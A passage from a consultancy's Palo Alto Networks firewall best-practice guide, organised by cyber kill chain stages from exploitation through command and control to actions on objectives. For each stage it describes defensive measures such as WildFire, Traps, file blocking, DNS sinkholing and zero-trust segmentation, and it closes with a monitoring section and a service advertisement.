  • Vulnerability Protection & Anti-Spyware – A Vulnerability Protection and Anti-Spyware profile should be applied to all internet related policies to block known vulnerabilities and spyware. Anti-Virus signatures have a very low false-positive rate as they clearly identify a file that is known to be malware. Vulnerability Protection and Anti-Spyware signatures on the other side match on network communication and with this are more prone to false positives. The reason is not only because it is technically more complex but also because there is a grey zone between what some people would classify as malware, while others classify it as legitimate software. Browser toolbars for instance often share usage information about their users which some people don’t see problematic while others would clearly classify it as Spyware. Therefore every company needs to make its own decision on what should be blocked and this makes optimization of the security profiles essential for effective security protection. As a starting point, it is recommended to block any threats with a severity of critical while the action for all other severities should be set to follow the default action which is more conservative to avoid false positives. Further customization is highly recommended. Packet captures should be enabled as these captures the malicious code that was sent by the attacker which provides additional information for analysis as well as proof of the attack. Palo Alto Networks Vulnerability Protection and Anti-Spyware signatures are based on malware detected by its threat intelligence cloud “WildFire” as well as Advanced Endpoint Protection solution “Traps” which makes it very effective. Please note that Vulnerability Protection and Anti-Spyware is only capable of blocking already known malware and SSL decryption is required to scan files inside any HTTP based communication.
  • Zero-day exploit detection and prevention (Wildfire) – All downloads of files with a risk to contain an exploit like Java, Flash, PDF, Microsoft Office and Android APK files should be analysed by WildFire as normal Anti-Virus, Anti-Spyware and Vulnerability Protection will only block known threats. WildFire extends the Next-Generation FireWall’s to identify and block targeted and unknown malware (0-day) by actively analysing unknown malware in a safe, cloud-based virtual environment, where Palo Alto Networks can directly observe malicious malware behaviours. WildFire automatically generates protections for newly discovered malware, and delivers these protections globally, enabling all customers to benefit from the analysis. An immediate delivery of signatures (every 15min), as well as the analysis of Java, Flash, PDF, Microsoft Office, Android APK files and E-Mail links, requires an additional Wildfire subscription. Please note that SSL decryption is required to analyse files inside any HTTP based communication.

 

3.4. Kill Chain Step 4 – Exploitation

 

At this stage, the malicious code has been delivered to the target where it can trigger the exploitation of a vulnerability. At this stage, the attacker is acting inside the trusted environment. An exploit is a sequence of commands that takes advantage of a bug or vulnerability in a software application or process. Attackers use exploits as a means to access and use a system to their advantage. To gain control of a system, the attacker must bypass a chain of vulnerabilities in the system. Blocking any attempt to exploit a vulnerability in the chain will block the exploitation attempt entirely.

 

The transfer of the malicious code traverses the firewall at the previous stage where it can be blocked but only if the malicious code triggers a signature match of a known threat. The exploit itself however can only be detected and blocked on the end-users device and as such is outside the control of the firewall. The prevention of exploits on the target is therefore outside the scope of this document. However, we still would like to point out possible solutions like Palo Alto Networks Advanced Endpoint Protection called “Traps”.

 

In a typical attack scenario, an attacker uses attempts to gain control of a system by first attempting to corrupt or bypass memory allocation or handlers. Using memory-corruption techniques such as buffer overflows and heap corruption, the hacker can then trigger a bug in the software or exploit a vulnerability in a process. The attacker must then manipulate a program to run code provided or specified by the attacker and evade detection. If the attacker gains access to the operating system, the attacker could then download a Trojan horse, malware programs that contain malicious executables, or otherwise use the system to their advantage which is the next step of the kill chain (step 5 – Installation).

 

Classical AntiVirus solutions employ signatures to identify executables, dynamic-link libraries (DLLs), or other pieces of code as malicious. The weakness of this method is that signature-based solutions take time to identify newly created threats known only to the attacker (also known as Zero-Day attacks or exploits) and add them to lists of known threats, leaving the endpoint vulnerable until the signatures are updated.

 

Attackers rely on a small number of exploit techniques like buffer overflows and heap sprays to trigger a bug in a software. Traps prevent exploit attempts by blocking these exploit techniques rather than trying to identify the malware based on its signature which makes it possible to block even zero-day attacks and vulnerabilities which are still unknown.

 

When a user opens a non-executable file, such as a PDF or Word document, the Traps agent seamlessly injects drivers into the software that opens the file. The drivers are injected at the earliest possible stage before any files belonging to the process are loaded into memory. If the process then opens the file, Traps injects a code module called an Exploitation Prevention Module (EPM) into the process. The EPM targets a specific exploitation technique and is designed to prevent attacks on program vulnerabilities based on memory corruption or logic flaws.

 

Examples of attacks that the EPMs can prevent include:

  • Memory corruption
  • Java code from running in browsers, under certain conditions
  • Executables from spawning child processes, under certain conditions
  • Dynamic-link library (DLL) hijacking (replacing a legitimate DLL with a malicious one of the same name)
  • Hijacking program control flow
  • Inserting malicious code as an exception handler

 

In addition to automatically protecting processes from such attacks, Traps reports any prevention events to the Endpoint Security Manager and performs additional actions according to the settings of the policy rules. Common actions that Traps performs include collecting forensic data and notifying the user about the event. Traps do not perform nor relies on any additional scanning or monitoring actions which makes them lightweight with very little CPU and memory usage.

 

3.5. Kill Chain Step 5 – Installation

At stage number 5, the attacker tries to install a remote access trojan “RAT” or backdoor on the target to maintain persistence inside the environment. At this point, it is important to understand the difference between an exploit which we described in the previous two stages and executable malware like a Trojan or backdoor. For an advanced persistent threat, the attacker needs to establish persistence on the target which means that he has to establish full remote access and control on the victim’s device while evading detection. At the exploit stage, the attacker is however still limited by the functionality of the program in which vulnerability was exploited. Even if the attacker gained shell access through the exploit then he is still limited to the operation of the shell which for instance does not provide any advanced functionality like key-logging. In addition, such shell access is usually logged which makes it difficult to evade detection. Therefore the attacker has to download additional executable software like a Remote Access Trojan “RAT” which will provide all the necessary functionality to gain full remote access independent of the exploited application as well as additional tools to for instance monitor the victim’s activity.

 

Through social engineering, adversaries have the possibility to deliver executable software like a Remote Access Trojan “RAT” directly to the end user’s device for instance via e-mail and trick the victim into installing the software. This allows the attacker to skip the previous two steps of the kill chain. However, the scope for such attacks is narrow which makes adversaries still dependent on the previous two exploit stages for most attacks.

 

3.5.1. Possible Action by the Attacker (Risks)

At the installation stage, the attacker uses the elevated access which he gains through the previous exploitation stage to execute commands or code which instructs the target device to download the RAT or backdoor. The biggest risk is therefore if an end-user device is allowed to download executable files from the internet. Once downloaded, the RAT will install itself, often with rootkit capabilities that enable the malware to embed itself deeply into the operating system which makes it stealthy. With this, it will evade detection by hiding the existence of certain processes or programs.

 

Most AntiVirus solutions will not be able to detect such modern malware at the download stage as they are highly polymorphic which means they constantly change their signatures to effectively avoid the detection by signature-based AntiVirus. Even if the AntiVirus software receives an update at a later stage that could identify the malicious file then it will still not be able to detect or remove it as the malware is already installed and hidden by the rootkit.

 

3.5.2. Threat Prevention Techniques for Mitigation & Defence

  • Application Control (Outbound) – The basis for security protection is to limit the attack surface and with this the attack-ability of a network and its devices. One of the most effective methods to reduce the attack surface is network segmentation and to control the use of applications with a positive application allow list. With this, only applications that are explicitly configured in the security policy are allowed and consequently, all others are blocked. Alternatively, a negative enforcement policy should be implemented in environments where it is not feasible to allow only specific applications like guest networks which have to provide for a wide variety of constantly changing applications. Such a negative enforcement policy will then block all high risk or known bad applications like especially high-risk applications which are known to be used to transfer malware. These applications can be dynamically grouped on the Next-Generation firewall by using an Application filter with the subcategory “file-sharing”, a risk level of 5 and application characteristics “Prone to misuse” and “Used by malware”. Application filters are automatically updated with the installation of every new content update which means if Palo Alto Networks identifies a new application that matches these criteria then this application will automatically be blocked. These kinds of networks still present a high risk and should therefore be separated from the internal network through a dedicated security zone on the firewall and access into the internal network should be restricted at a similar security level like connections originating from the internet. Please note that SSL decryption is required to identify applications inside any HTTP based communication.
  • URL Filtering – As described in the previous stage, URL Filtering should be applied to all internet related policies to block access to any high-risk categories like malware, web advertisements, questionable, proxy-avoidance-and-anonymizer, phishing, peer-to-peer, parked and hacking.
  • File Blocking – File Blocking is one of the most reliable threat prevention techniques at this stage of the kill chain as it is capable of blocking the download of executable files. This is important because the advanced functionality of a RAT can only be delivered in form of a fully compiled software or portable executable “PE” file. A file blocking profile should therefore be applied to all security policies which allow Internet access to block the download of “PE” files. The Next-Generation firewall will also detect PE files inside of zip files which will block the entire zip file. Data inside of encrypted files like “encrypted-zip” or “encrypted-rar” cannot be decrypted and should therefore be blocked as well. The download of legitimate files from trusted sources can be explicitly allowed through dedicated security policies based on applications and URLs. Please note that SSL decryption is required to analyse files inside any HTTP based communication.
  • Anti-Virus & Anti-Spyware – If the download of executable files is allowed from trusted sources then these files should still be scanned by an Anti-Virus and Anti-Spyware profile because there is no guarantee that for instance the webserver of a trusted partner or even a high profile company will not be compromised by malware. Please note that Anti-Virus and Anti-Spyware are only capable of blocking already known malware and SSL decryption is required to scan files inside any HTTP based communication.
  • Zero-day malware detection and prevention (Wildfire) – As with Anti-Virus and Anti-Spyware, if the download of executable files is allowed from trusted sources then these files should still be analysed by Wildfire to detect and block 0-day malware. A basic WildFire service is included in the base system of the Next-Generation FireWall to analyse PE files while signature updates are delivered only on a daily basis as part of the threat prevention subscription. An immediate delivery of signatures (every 15min) requires an additional Wildfire subscription. Please note that SSL decryption is required to analyse files inside any HTTP based communication.
    SSL Decryption (SSL Forward Proxy) – SSL decryption should be enabled especially for all communication with the Internet. With this, the firewall will decrypt the data which will enable it to identify applications inside the SSL tunnel as well as the blocking of files.


3.6. Kill Chain Step 6 – Command and Control (C2)

 

At the command and control stage, the remote access trojan “RAT” on the compromised host will establish a communication channel to the attackers command and control the “C2” server. Once the C2 channel has been established, the intruder has “hands on the keyboard” access to the compromised host inside the target environment.

 

For end-user devices, there is also the possibility of an already compromised host connecting to the corporate network. This stage provides the opportunity to identify such malware-infected devices as they come into the network and stop further communication between the compromised host and the C2 server.

 

3.6.1. Possible Action by the Attacker (Risks)
Persistence is one of the main objectives of an APT. When the command and control “C2” server is no longer reachable, because for instance it has been taken down by law enforcement, then the RAT on the compromised host has to automatically establish a C2 channel to a new C2 server so that the attacker can re-establish control. Attackers achieve this resilience by using DNS which easily enables them to point their command and control domain to a new IP address. More sophisticated malicious operations on the internet use a technique called “Fast-flux” which constantly changes the mapping of the IP address to the domain. This enables the attacker to build a network that obscures his true location as all connections are proxied through a constantly changing layer of IP addresses.

 

Once the RAT has resolved the IP address of its C2 server via DNS it will establish the C2 channel. Blocking these C2 channels can be challenging with legacy port based firewalls as applications can use any TCP or UDP port number to communicate and therefore the assumption, based on which a port-based firewalls are designed, that a specific port equals a specific application is no longer true. The same applies to the command and control communication of malware which often uses port numbers of common applications like web-browsing (port 80) or DNS (port 53) to evade detection.

 

3.6.2. Threat Prevention Techniques for Mitigation & Defence

  • Application Control (Outbound) – The Next-Generation FireWall identifies any type of network communication as an application, independently of the port. It is obviously impossible to know of every application in existence and therefore all network communications which cannot be associated with a list of well-known applications will be identified as either “unknown-udp” or “unknown-tcp”. Blocking these unknown applications is one of the most effective prevention techniques for command and control traffic as C2 channels are mostly proprietary applications that are identified as unknown by the Next-Generation FireWall. These will therefore be blocked even if it is a completely new type or zero-day command and control application.
  • DNS Sinkhole – Palo Alto Networks identifies malicious command and control domains using its threat intelligence cloud “Wildfire”. Once Wildfire identifies new malware based on its behaviour it also knows the domain to which it tried to connect to establish a command and control channel. These domains are then delivered to the firewall as part of the Anti-Spyware protection which enables the firewall to block them. A challenge that arises out of this however is that most devices send DNS queries to an internal DNS server. The DNS Server then sends this query over the firewall to the internet which means if the firewall blocks a DNS request with a malicious domain then the originator is the DNS Server and not the compromised host. DNS sinkholing is an additional feature that solves this visibility problem by forging responses to the client host that are directed at malicious domains so that clients attempting to connect to malicious domains for command-and-control will instead attempt to connect to a sinkhole IP address defined by the administrator. Infected hosts can then be easily identified in the traffic logs because any host that attempts to connect to the sinkhole IP address is most likely infected with malware.
  • Anti-Spyware – Similar to command and control domains, Wildfire also identifies the command and control channel communication of newly identified malware. Signatures for such command and control traffic are then delivered to the firewall as part of the Anti-Spyware protection which enables the firewall to block them.

3.7. Kill Chain Step 7 – Actions on Objectives

Only at the last stage, after progressing through the first six phases, can intruders take action to achieve their original objectives.

 

3.7.2. Threat Prevention Techniques for Mitigation & Defence

  • Zero Trust – At stage 7, the host has been fully compromised and is under total control of the attacker. The best defence strategy at this stage is “Survival” by limiting the possible damage. So for instance an end-user device carries a high risk of being compromised because of the human factor and in some cases the mobility of such devices making restricting physical access a challenge. However, compromising a single end-user device might not be sufficient for the attacker to achieve the objective of data exfiltration because the valuable data is mostly stored on servers inside the datacentre. Granular network segmentation based on a Zero Trust Architecture with the principles of “Never Trust – Always Verify” will contain the attack at a boundary that will limit the possible damage.
  • Data Filtering – The Next-Generation FireWall has the capability to identify and block unique data patterns in network communication. This data filtering feature can be used to identify and stop the exfiltration of data. The functionality can be compared to a data loss prevention “DLP” solution even though it is not as extensive.

4. Monitoring

  • Risks – After the initial setup and implementation of best practices, things usually settle down and the administrator is not monitoring the events on the firewall as closely on a daily basis. This creates the risk that new types of attack or any other events which require action by the administrator may be overlooked.
  • Mitigation – Custom reports should be set up and automatically send by e-mail to administrators for review. It is important that these reports are relevant, and only show information that is relevant and most likely to require action by the security administrator. Irrelevant information will quickly cause a situation, where the administrator is no longer actively reviewing the reports. As part of this analysis, the custom report has been created for each area covered in this report and these custom reports can be used as a base for further customization.

Follow us on LinkedIn to hear when we publish the next best practice video or sign up to our FireWall Best Practices mailing list.

Need Help?

Contact us or give us a call +353 (1) 5241014 / +1 (650) 407-1995​ – ​We are a Palo Alto Networks Certified Professional Service Provider (CPSP) and the Next-Generation Security Platform is what we do all day every day. Let us share our experience with you to make your Next-Generation Security project a smooth experience but most importantly a peace of mind by truly securing your valuable IT assets.

Palo Alto Certified Professional Service Provider (CPSP) Logo
Creative Commons Attribution ShareAlike for training courses

This document is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License. You are free to share and adapt this document as long as you give appropriate credit to the author Lars Meyer. If you remix, transform or build upon the material, you must distribute your contributions under the same license as the original.

Disclaimer: Consigas Limited accepts no liability for the content of this blog post, or for the consequences of any actions taken on the basis of the information provided. Any views or opinions presented in this document are solely those of the author and do not necessarily represent those of Palo Alto Networks.